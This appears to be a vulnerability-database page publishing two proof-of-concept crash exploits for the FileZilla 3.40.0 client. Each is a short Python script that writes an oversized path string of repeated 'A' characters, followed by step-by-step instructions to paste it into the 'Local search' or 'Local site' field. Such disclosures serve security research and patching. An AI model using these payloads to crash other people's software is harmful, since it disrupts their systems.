FileZilla 3.40.0 Denial Of Service

2019.03.02
Credit: Mr Winst0n
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC) # Discovery by: Mr Winst0n # Discovery Date: February 20, 2019 # Vendor Homepage: https://filezilla-project.org # Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 # Tested Version: 3.40.0 # Tested on: Kali linux x86_64 # Vulnerability Type: Denial of Service (DoS) # Steps to Produce the Crash: # 1.- Run python code : python filezilla.py # 2.- Open buff.txt and copy content to clipboard # 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively) # 4.- In the opend window, Set Search type to "Local search" # 5.- Paste ClipBoard on "Search directory" and click on "Search" # 6.- Boom! Crashed... #!/usr/bin/env python buffer = "\x41" * 384 crash = "/" + buffer + "BBBB" + "CCCC" f = open("buff.txt", "w") f.write(crash) f.close() # Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path. # Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC) # Discovery by: Mr Winst0n # Discovery Date: February 25, 2019 # Vendor Homepage: https://filezilla-project.org # Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 # Tested Version: 3.40.0 # Tested on: Kali linux x86_64 # Vulnerability Type: Denial of Service (DoS) # Steps to Produce the Crash: # 1.- Run python code : python filezilla-2.py # 2.- Open crash.txt and copy content to clipboard # 3.- In "Local site" section paste clipboard and Enter. # 4.- Boom! Crashed... #!/usr/bin/env python buffer = "\x41" * 384 crash = "/" + buffer + "BBBB" + "CCCC" f = open("crash.txt", "w") f.write(crash) f.close() # Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top